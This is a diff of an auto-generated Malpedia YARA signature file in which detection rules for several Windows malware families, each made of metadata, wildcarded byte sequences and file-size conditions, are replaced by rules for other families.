+		$sequence_5 = { b4bf 49 95 14c0 393f d8d3 fc }
+		$sequence_6 = { 7135 fd 9e 9d 50 50 9c }
+		$sequence_7 = { c9 09f8 96 67a4 61 52 636e85 }
+		$sequence_8 = { 9d 53 6a03 e8???????? 83c40c 9c f605????????e8 }
+		$sequence_9 = { be492ea060 c14434e19e 46 2f d3f4 fa 6be92a }
 
 	condition:
-		7 of them and filesize < 679936
+		7 of them and filesize < 3227648
 }
-rule MALPEDIA_Win_Mqsttang_Auto : FILE
+rule MALPEDIA_Win_Floxif_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fcd67af-429a-5d69-a3b0-3220fad637de"
+		id = "ffd7b18b-df79-5e10-a446-739ad37f5cd1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mqsttang_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.floxif_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "11a5ef4fb125e32dd68c79670f73b1f4916ce31a149e2ff34e91c4e49e4be013"
+		logic_hash = "ea5402045cc061612aa202cf5adc4c091c680ec32b64c798623434387b1d2b20"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125151,32 +124988,32 @@ rule MALPEDIA_Win_Mqsttang_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebd4 ebf3 8d4dcc 89c3 e8???????? ebc6 ebe5 }
-		$sequence_1 = { f20f105dd8 f20f1065e0 f20f115db8 f20f1165b0 0f87a9000000 890c24 89d9 }
-		$sequence_2 = { ebec 8b95e4baffff 29ca 83fa02 0f8e87f7ffff 668b4004 6683f83d }
-		$sequence_3 = { eb0f f6c220 7413 8365081f 837d0801 7420 43 }
-		$sequence_4 = { ff15???????? 891c24 89442404 89c6 c745d402000000 c745d800000000 c745dc00000000 }
-		$sequence_5 = { eb16 8b5604 83c301 8b4208 8b4a0c 29c1 39d9 }
-		$sequence_6 = { f0832a01 742b 8b542420 8b0a 85c9 7451 83f9ff }
-		$sequence_7 = { f0832801 0f84231b0000 8b4588 8b4010 8b10 85d2 0f84f01a0000 }
-		$sequence_8 = { c7042400000000 b903000000 ba21000000 89d8 e8???????? 85c0 0f84db000000 }
-		$sequence_9 = { e8???????? 8985bcfeffff e9???????? 8b4508 8b95fcfeffff 8b4874 8b85f8feffff }
+		$sequence_0 = { 837dfc05 7e02 eb0d 68a00f0000 ff15???????? }
+		$sequence_1 = { eb09 8b45a8 83c001 8945a8 8d4dc0 e8???????? 3945a8 }
+		$sequence_2 = { 68???????? 8d4de0 e8???????? 68???????? b9???????? e8???????? 6a00 }
+		$sequence_3 = { e8???????? 8d4d08 51 8d4de4 e8???????? c645f400 }
+		$sequence_4 = { 51 8b55f4 52 8b45fc 50 6aff 8b4d08 }
+		$sequence_5 = { 837df800 7e68 8b45f8 83c001 50 6a00 8d8d4cffffff }
+		$sequence_6 = { c6855fffffff94 c68560ffffff92 c68561ffffffe1 c6458c00 c6458d00 c6458e72 }
+		$sequence_7 = { e8???????? e8???????? 83c410 682c010000 ff15???????? e8???????? 83ec10 }
+		$sequence_8 = { 83c40c 8b5510 52 8b450c c1e004 8b4d08 03c8 }
+		$sequence_9 = { 7629 a1???????? 0305???????? 8b4d0c 3981b8000000 7313 }
 
 	condition:
-		7 of them and filesize < 12651520
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Afrodita_Auto : FILE
+rule MALPEDIA_Win_Urlzone_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0b89d48b-e8eb-5aec-a4a1-cb25be8e6ea8"
+		id = "4dd4d8e5-7756-57be-8ce5-a21c7832bb2c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.afrodita_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.urlzone_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "ba96a282578cd431adb4de4c63175081873626ab508dce847aa3397ecdd6e0da"
+		logic_hash = "c42481bd862ad161fd4e6a711568aaf0139280c4a77d4d9855a08ac723543c9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125190,34 +125027,34 @@ rule MALPEDIA_Win_Afrodita_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff75dc e8???????? 83c40c 84c0 0f84aa030000 }
-		$sequence_1 = { 52 53 ff7508 8b4004 c645fc01 8b4c3038 8b01 }
-		$sequence_2 = { e8???????? 83c404 c645fc09 8d8d6cffffff ff75a0 e8???????? 83e3df }
-		$sequence_3 = { 6a7d 8d4d80 53 e8???????? e9???????? 83ff4d 0f8443010000 }
-		$sequence_4 = { 33c8 8b45f0 3345e4 23c7 8b7ddc 3345e4 03c8 }
-		$sequence_5 = { 837d1000 8b10 0f444d10 51 56 }
-		$sequence_6 = { 2345e4 03ca 3345f4 03c1 8945e4 85db 7437 }
-		$sequence_7 = { 51 8d4b04 ff5008 68???????? 50 8d45c0 c745fc00000000 }
-		$sequence_8 = { 7445 833d????????00 743c 56 6a10 8d45ec 50 }
-		$sequence_9 = { e8???????? eb05 e8???????? 83c404 8b9564ffffff 399560ffffff 8bb568ffffff }
+		$sequence_0 = { 55 8bec 81c4e8fbffff 53 56 57 8b4514 }
+		$sequence_1 = { 8910 33c0 8943e4 c745fcffffffff eb1f 46 83c340 }
+		$sequence_2 = { 83fbff 0f8420070000 6a00 53 e8???????? 8945f8 }
+		$sequence_3 = { 50 e8???????? 6a00 6a00 2df1000000 50 8b06 }
+		$sequence_4 = { 6a00 56 6a00 6802000001 6a00 53 }
+		$sequence_5 = { 85c0 7c04 85d2 7d02 33c9 8bc1 c3 }
+		$sequence_6 = { 50 e8???????? b001 e8???????? 68???????? 68???????? e8???????? }
+		$sequence_7 = { c6041000 bf01000000 8db36cfeffff 8b06 85c0 7438 }
+		$sequence_8 = { bb???????? 8b45f8 50 8d8577ffffff 50 }
+		$sequence_9 = { 7435 e9???????? 56 8d85effdffff }
 
 	condition:
-		7 of them and filesize < 2334720
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Miuref_Auto : FILE
+rule MALPEDIA_Win_Purplefox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1b96c0a2-4f7f-5dba-b4cc-c39446b366ca"
+		id = "a13fd35f-ff4a-5d50-9b5d-b24cdc4536ab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miuref_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.purplefox_auto.yar#L1-L381"
 		license_url = "N/A"
-		logic_hash = "9f0c33a604555481ceaef6b71f9838cb9fae83fec546a9a4bdc6479d8cf9ac8a"
+		logic_hash = "19db2fd8d55e9f90545cae61363b7c1883764c9fb7fb14f78b3fa3d087d84046"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125229,32 +125066,62 @@ rule MALPEDIA_Win_Miuref_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b750c 81fe00020000 7204 33c0 eb73 53 bb00200000 }
-		$sequence_1 = { e8???????? 59 b9???????? 3b01 7445 83c104 81f9???????? }
-		$sequence_2 = { 50 ff742418 e8???????? ff742420 8bf0 56 e8???????? }
-		$sequence_3 = { 8d45a8 83ec58 50 e8???????? ff7510 8d45a8 ff750c }
-		$sequence_4 = { 8d45cc 50 ff15???????? 8b45fc 8b08 50 ff9180000000 }
-		$sequence_5 = { e8???????? ff75f4 e8???????? 8b45e8 83c418 }
-		$sequence_6 = { 7704 50 51 eb27 837d1400 750c 57 }
-		$sequence_7 = { 3bc3 7320 894508 8b450c 8b4d08 8d4c08c1 56 }
-		$sequence_8 = { e8???????? 59 6a00 8bf0 8d45fc 50 57 }
-		$sequence_9 = { e8???????? 53 e8???????? 33f6 56 e8???????? }
+		$sequence_0 = { 8b15???????? 53 8a1d???????? 6a01 8906 }
+		$sequence_1 = { 8945f4 3bc7 740d 8b7308 }
+		$sequence_2 = { c1fa05 c1e006 030495000c4100 eb05 b8???????? f6400420 }
+		$sequence_3 = { 85c0 7912 488b8d90010000 ff15???????? e9???????? 488b8d98010000 4533c9 }
+		$sequence_4 = { 8bcf e8???????? e9???????? 488d0df6200000 ff15???????? 488b3b }
+		$sequence_5 = { 6800000010 8d45f8 bf40020000 50 c745c018000000 895dc4 }
+		$sequence_6 = { 488d4e1c 33d2 41b801010000 e8???????? 4c8d546d00 4c8d1db0920000 49c1e204 }
+		$sequence_7 = { 66b8f230 8b4500 f9 f9 e9???????? }
+		$sequence_8 = { ff15???????? 488d542440 488d0dca110000 4c8bc6 ff15???????? 488d4c2440 41b001 }
+		$sequence_9 = { 57 4883ec60 48c7442440feffffff 48899c2488000000 }
+		$sequence_10 = { 8b7de8 56 8d8dacfbffff 51 8d55b0 52 }
+		$sequence_11 = { 8da42400000000 8038ff 750b 80780175 7505 385802 7409 }
+		$sequence_12 = { c9 49 3658 8a3f 3658 7642 }
+		$sequence_13 = { 4889442430 488b05???????? c644242800 488b08 ba00020000 48894c2420 }
+		$sequence_14 = { ff15???????? 8bf0 85f6 7914 56 68???????? ffd3 }
+		$sequence_15 = { ebcf 8bc6 c1f805 8b0485000c4100 83e61f c1e606 8d443004 }
+		$sequence_16 = { 35fd937dd3 43 d0f2 2f 4a 87cd }
+		$sequence_17 = { 448bc6 442bc0 488b442450 488d0d4b7e0000 488b0cc1 }
+		$sequence_18 = { 56 12581a 887ea4 3d0b3a08c2 }
+		$sequence_19 = { 83c408 6a00 51 ff15???????? 8bf0 }
+		$sequence_20 = { 51 e8???????? 83c404 8b5704 68???????? }
+		$sequence_21 = { 81e900202200 be100000c0 0f84ec020000 83e904 0f8486010000 83e904 }
+		$sequence_22 = { 3918 0f4c18 3bcb 0f8d87000000 488d3dd7b70000 ba58000000 488bcd }
+		$sequence_23 = { 9c 60 c64424043e f5 }
+		$sequence_24 = { 488b4c2470 ff15???????? 488b8d08040000 ff15???????? }
+		$sequence_25 = { 57 56 6a0b ffd3 3d040000c0 750d }
+		$sequence_26 = { 85c0 790a 8b4df8 ffd3 e9???????? }
+		$sequence_27 = { 58 773d 33f9 13c9 }
+		$sequence_28 = { e8???????? 33ff 33c0 8945f4 8945f0 8945f8 8b450c }
+		$sequence_29 = { c740e40d000000 8b55f8 8950e8 8b4660 }
+		$sequence_30 = { 488d4c2420 33d2 4889442420 8b05???????? }
+		$sequence_31 = { 4883f83c 7647 498bcd e8???????? 4c8d05436c0000 41b903000000 488d4c45bc }
+		$sequence_32 = { 488b4b08 ff15???????? c70300000000 4883c420 5b c3 }
+		$sequence_33 = { 4883c202 668941fe 6685c0 75ec 488b7e08 4883c9ff 33c0 }
+		$sequence_34 = { 4883ec20 488bd9 e8???????? 4c8d1d17a10000 }
+		$sequence_35 = { ff15???????? 4839442470 0f85b3000000 488d542460 488bce ff15???????? 85c0 }
+		$sequence_36 = { e9???????? 660fb6d1 f9 8b5504 c0c107 d2e9 }
+		$sequence_37 = { 57 f361 634cea1c bc2cedefeb 59 fb 7fab }
+		$sequence_38 = { 7506 50 e9???????? 8b55ec }
+		$sequence_39 = { 56 68???????? ff15???????? 83c408 8bc6 5e 8be5 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 1983488
 }
-rule MALPEDIA_Win_Powershellrunner_Auto : FILE
+rule MALPEDIA_Win_Downex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a02b05b-5544-5fd8-bda1-2b73877e66ff"
+		id = "780df1d0-772a-58a4-934d-63bed6bd9744"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powershellrunner_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.downex_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "150515a586587c1b339d21af473c6cacdf2854e2b8551085b1787b23d2cc9d35"
+		logic_hash = "2787ed485caccd79e05aaa2383aa816bb0e34ab86d11b61c935876204e99082a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125268,34 +125135,34 @@ rule MALPEDIA_Win_Powershellrunner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c684243e02000036 c684243f02000014 c684244002000031 c684244102000031 }
-		$sequence_1 = { 488bd3 488d0d0f440200 e8???????? 33c9 85c0 480f44cb }
-		$sequence_2 = { 488d4c2450 e8???????? ba05000000 488d4c2448 e8???????? ba06000000 }
-		$sequence_3 = { b872000000 6689842452010000 b872000000 6689842454010000 b865000000 6689842456010000 }
-		$sequence_4 = { 8b442440 8b4c2444 03c8 8bc1 8bc8 ff15???????? 8b442424 }
-		$sequence_5 = { 488d4c2428 e8???????? 89442420 837c242000 7418 }
-		$sequence_6 = { 4889442428 eb1c 488b442420 4883c002 4889442420 488b442428 4883c002 }
-		$sequence_7 = { 4c8b442438 488d542420 488d4c2460 e8???????? 0fb6c0 85c0 7415 }
-		$sequence_8 = { 7363 488bf3 4c8d351b770100 83e63f 488beb 48c1fd06 48c1e606 }
-		$sequence_9 = { 488bc8 e8???????? 4c8d442440 488bd0 488b4c2448 e8???????? 488b842490000000 }
+		$sequence_0 = { 0fb6443b47 4b 2bf0 8d0440 8d0c82 8b84b7ec000000 8901 }
+		$sequence_1 = { ffb0d8f24700 e8???????? 83c40c 85c0 7419 46 8d0476 }
+		$sequence_2 = { e8???????? 8d8d58fdffff e8???????? 8b4da4 83c148 8d4601 50 }
+		$sequence_3 = { 297e04 83c40c 013e 017e08 8b4e04 83560c00 017e10 }
+		$sequence_4 = { eb2c b9???????? eb25 b9???????? eb1e 3ddec0c5b0 7412 }
+		$sequence_5 = { 7214 83c123 8b50fc 2bc2 83c0fc 83f81f 0f87d3030000 }
+		$sequence_6 = { ff7508 e8???????? 83c414 33d2 85c0 b900100000 0f44d1 }
+		$sequence_7 = { 85c0 0f85a0050000 f6872802010010 0f8407010000 8b8eb4000000 8bd1 68b5070000 }
+		$sequence_8 = { 50 e8???????? 68???????? 6aff ffb5f0feffff e8???????? 8bb5f8feffff }
+		$sequence_9 = { e8???????? 83c410 eb1f 81e7ffffdfff f7c200002000 7411 8d45e4 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 1067008
 }
-rule MALPEDIA_Win_Batel_Auto : FILE
+rule MALPEDIA_Win_Bootwreck_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce5297ec-2628-56fe-90d3-14a58de70bd5"
+		id = "c86e0360-3c55-5b68-af4c-6642481fbd38"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.batel_auto.yar#L1-L219"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bootwreck_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "be5c7cfc92fc63831f946ba5608b114c38a6759dff1e1a478b017b493c38ecb1"
+		logic_hash = "a7d19ddda34fd585dce842e8452aa3b90378f4a99b150c5642a8436fb2a84d1d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125307,43 +125174,32 @@ rule MALPEDIA_Win_Batel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 5b c21000 3b0d???????? 7502 }
-		$sequence_1 = { eb35 a1???????? 81b80000230050450000 75eb b90b010000 66398818002300 }
-		$sequence_2 = { 7412 ffd0 56 ffd3 68005c2605 ffd5 47 }
-		$sequence_3 = { 8bec 81eca0020000 68ee020000 ff15???????? 689d020000 }
-		$sequence_4 = { 85f6 7422 68???????? 56 ff15???????? 85c0 7412 }
-		$sequence_5 = { 57 6a40 6800100000 689e020000 }
-		$sequence_6 = { 68005c2605 ffd5 47 83ff5a 7ccd 5f 5e }
-		$sequence_7 = { 55 8b2d???????? 56 57 68a00f0000 ffd5 8b1d???????? }
-		$sequence_8 = { 33c9 b8???????? 8a10 88940d60fdffff }
-		$sequence_9 = { 6868212300 e8???????? 33db 895de4 8d4594 50 ff15???????? }
-		$sequence_10 = { 8935???????? 68d0202300 68c4202300 e8???????? 59 59 }
-		$sequence_11 = { 66a5 ffd0 5f 5e }
-		$sequence_12 = { e9???????? 6894152300 e8???????? a1???????? c704242c302300 ff35???????? }
-		$sequence_13 = { ff15???????? 689d020000 8d8561fdffff 6a00 50 }
-		$sequence_14 = { 50 c68560fdffff00 e8???????? 83c40c 33c9 }
-		$sequence_15 = { 41 3d???????? 7cec 56 57 }
-		$sequence_16 = { 8b1d???????? bf01000000 8d642400 68???????? ff15???????? 8bf0 85f6 }
-		$sequence_17 = { c745fc00000000 6800002300 e8???????? 83c404 85c0 }
-		$sequence_18 = { 689e020000 6a00 ff15???????? 8bf8 b9a7000000 8db560fdffff f3a5 }
-		$sequence_19 = { c3 8bff 56 b858212300 be58212300 57 }
-		$sequence_20 = { 7419 ffd0 56 ffd3 68404c5827 ff15???????? 47 }
+		$sequence_0 = { 9e 3ec9 307dd6 14cc 7466 d59d }
+		$sequence_1 = { c60424de 57 9c 875c242c ff742404 54 9c }
+		$sequence_2 = { fd 7919 87c1 0e d9574e 6d 7db2 }
+		$sequence_3 = { 8b8020334500 c60424ef 60 8d8090b42a7f 8d642434 0f8f702c0000 687b1f6def }
+		$sequence_4 = { 660fb6db 89f3 660fbef1 5e 660fce 8b742440 88442404 }
+		$sequence_5 = { 70e8 32ff 46 33e2 41 2eb910b0f8ab 828dc6785b1254 }
+		$sequence_6 = { e8???????? f6d2 8b5620 60 9c ff742404 89542424 }
+		$sequence_7 = { 60 e7c6 45 14bb aa 11fe 1d0a3b6a57 }
+		$sequence_8 = { b6d1 0206 82535e09 3909 a6 ae 57 }
+		$sequence_9 = { 660fb6c9 660bf9 0fb7cf 8b7d10 894d0c 2acb 32c8 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 10821632
 }
-rule MALPEDIA_Win_Nautilus_Auto : FILE
+rule MALPEDIA_Win_Amtsol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "77d46a5b-ac0a-5fed-b7dc-730469f1a198"
+		id = "10cd2a6a-97cd-5bbf-a2de-d51937233e16"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nautilus_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.amtsol_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "75449a89b7fb4754deadb905e528b81ef0ad7c932b9a665933340397cfc77449"
+		logic_hash = "f41e59806427fb3074e56403dfc0119ba4416aa791cb2055a2846e43c19529c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125357,32 +125213,32 @@ rule MALPEDIA_Win_Nautilus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? eb0b 0f28ce 488bcb e8???????? 660f2efe 7a02 }
-		$sequence_1 = { e8???????? 410fb7445c0a 498bce 0fb61406 448b0487 e8???????? 410fb7445c0c }
-		$sequence_2 = { e9???????? 413bfc 0f84c7000000 41be20000000 eb09 413bfc 0f84b6000000 }
-		$sequence_3 = { f20f5ccd eb08 f20f59ce f20f58ce 4885d2 7407 0f570d???????? }
-		$sequence_4 = { eb19 443bc3 7f14 c1e917 4103c8 3bd9 7f0a }
-		$sequence_5 = { 85c0 751b 488d4b18 8d5001 e8???????? 85c0 750b }
-		$sequence_6 = { 7459 41ffca 740a b800bfffff 4883c458 c3 488b842498000000 }
-		$sequence_7 = { 7520 488d7eff 488d55b0 488d4dc8 4885ff 756b e8???????? }
-		$sequence_8 = { 83f815 0f842b010000 83f816 74ba 83f817 745e 7e3c }
-		$sequence_9 = { 7424 bafeffff7f 33c9 e8???????? 8bcb 8bd0 488b4730 }
+		$sequence_0 = { 8bec 83ec20 53 56 8b7508 33db 3bf3 }
+		$sequence_1 = { 035e24 8945fc 8b45f8 8d9c1839d0d4d9 53 e8???????? 8b4df0 }
+		$sequence_2 = { 836d1010 8b7d10 83e810 8bf0 a5 a5 }
+		$sequence_3 = { 50 8d4de4 e8???????? 84c0 7418 8d4de4 e8???????? }
+		$sequence_4 = { c6451054 c6451172 c6451261 c645136e c6451473 c6451566 }
+		$sequence_5 = { 3d01010000 7d0d 8a4c181c 8888b82b4200 40 ebe9 }
+		$sequence_6 = { 53 e8???????? 0345fc 8b4df0 8945f8 8b45f4 }
+		$sequence_7 = { 50 e8???????? 59 50 ff7604 e8???????? 83c41c }
+		$sequence_8 = { 33cb 030e 8d840878a46ad7 50 e8???????? 0345fc }
+		$sequence_9 = { 83c040 50 e8???????? 83c40c 8bc6 5e c3 }
 
 	condition:
-		7 of them and filesize < 1302528
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Putabmow_Auto : FILE
+rule MALPEDIA_Win_Auriga_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "91e8d589-44ec-5d63-963b-4d5831e9d035"
+		id = "34318cf5-8b0c-5480-b67c-27a4f4ec96e2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.putabmow_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.auriga_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "b27fa1335b6a432b3b5508ab17de3d0a99cf669e0fc066f733c76db90efddfc9"
+		logic_hash = "916cc30b11a1636c868f6de19248b0e5c25381e64e7d76c56c161fbf71269000"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125396,32 +125252,32 @@ rule MALPEDIA_Win_Putabmow_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6200 3100 680032006f 0033 0010 0035???????? 007b00 }
-		$sequence_1 = { e8???????? c645fc06 8b467c 89477c 8b8680000000 898780000000 8b8684000000 }
-		$sequence_2 = { 32db c78424200b000021000000 8b442418 a802 }
-		$sequence_3 = { c1f905 83e107 094828 8a5201 f6c204 7404 83482810 }
-		$sequence_4 = { 3901 61 0039 016200 3f 016300 3f }
-		$sequence_5 = { 8b4df8 8bd6 ff75e8 57 ff75f0 6a00 50 }
-		$sequence_6 = { 8d8c24b0070000 ff30 e8???????? c68424200b00004c 8d8424e0000000 50 8d8c24f8040000 }
-		$sequence_7 = { c684249404000000 84db 0f8493010000 f7462800004000 8d5618 7502 8b12 }
-		$sequence_8 = { 3bf1 7608 89442420 2bf1 eb02 33f6 8b4314 }
-		$sequence_9 = { 888630977300 46 ebe5 a1???????? 83c9ff f00fc108 7513 }
+		$sequence_0 = { 59 59 8945fc 897df8 763a }
+		$sequence_1 = { 83c10c 894df4 8b11 3b15???????? 755b 8bd0 2b55fc }
+		$sequence_2 = { ffd7 33c0 8985c0fbffff 8985ccfbffff 8985d0fbffff 8d85bcfbffff }
+		$sequence_3 = { 33c0 83c40c 8d7dec ab ab 33c0 6a20 }
+		$sequence_4 = { 59 648b01 8b400c 8b701c ad 8b4008 }
+		$sequence_5 = { 742d 8b430c 8b580c 53 ffd7 84c0 7420 }
+		$sequence_6 = { 8b0d???????? 03c1 3900 74f0 8b15???????? 56 }
+		$sequence_7 = { 59 59 8945fc 897df8 763a 8b45e8 03c7 }
+		$sequence_8 = { 0f8ce7010000 8d85e8f9ffff 50 8d85e0f9ffff }
+		$sequence_9 = { 8945e8 a1???????? 8b1c30 8bfb 8d45f0 8d5001 8a08 }
 
 	condition:
-		7 of them and filesize < 704512
+		7 of them and filesize < 75776
 }
-rule MALPEDIA_Win_Mount_Locker_Auto : FILE
+rule MALPEDIA_Win_Advisorsbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2052c543-cb18-5d1a-a87c-7c9ba4a04469"
+		id = "47285543-3eed-5a34-ac06-14b7c71920ba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mount_locker_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.advisorsbot_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "9773bfd51e99f33a259a570fd66a0ee2d45575bac793a3c37128b45245a677af"
+		logic_hash = "69dc9add5b159b8414559d7edfb0ea4fa61745cf82bdc631ece400efa0729506"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125435,40 +125291,41 @@ rule MALPEDIA_Win_Mount_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 498be8 4d8bc8 4c8bc2 4c8bf2 }
-		$sequence_1 = { f30f5905???????? 0f5ad0 66490f7ed0 e8???????? }
-		$sequence_2 = { 8bc8 81e10000ffff 81f900000780 7503 0fb7c0 3d2e050000 }
-		$sequence_3 = { 488b0b 41b902000000 4533c0 33d2 }
-		$sequence_4 = { 488d4df0 4889442428 4533c9 4533c0 }
-		$sequence_5 = { 4c8bc2 4c8bf2 8bf1 33d2 33c9 }
-		$sequence_6 = { 4c8b05???????? 488bcb 488b15???????? e8???????? }
-		$sequence_7 = { 4533c9 488b4c2458 33d2 c744243001000000 c744243c02000000 }
-		$sequence_8 = { ff15???????? 85c0 7509 f0ff05???????? }
-		$sequence_9 = { 7505 e8???????? 833d????????00 7409 833d????????00 }
-		$sequence_10 = { 7423 488b0d???????? 4885c9 7417 488364242000 4c8d4c2468 }
-		$sequence_11 = { 57 ff15???????? 8bd8 85db 7442 }
-		$sequence_12 = { 66894df8 668945f4 56 56 }
-		$sequence_13 = { 8b7c2414 8b35???????? bd???????? 8b15???????? 8bde 03df 89542414 }
-		$sequence_14 = { c3 6aff ff7508 e8???????? 68???????? }
-		$sequence_15 = { 59 59 5f 5e 33c0 5d }
+		$sequence_0 = { 8bc1 2bc2 d1e8 03c2 c1e808 }
+		$sequence_1 = { 8bc2 33d2 c1e809 f7f1 }
+		$sequence_2 = { 8bc2 33d2 c1e808 f7f1 }
+		$sequence_3 = { b89b01a311 f7e1 2bca d1e9 03ca }
+		$sequence_4 = { b80923ed58 f7e1 8bc1 2bc2 }
+		$sequence_5 = { d1e8 03c2 33d2 c1e809 }
+		$sequence_6 = { 8bc2 c1e809 33d2 f7f1 }
+		$sequence_7 = { d1e9 03ca c1e907 2bc1 }
+		$sequence_8 = { d1e9 03ca c1e909 33c8 }
+		$sequence_9 = { d1e9 03ca 33d2 c1e908 }
+		$sequence_10 = { 8b442408 8b4c2408 33d2 f7f1 }
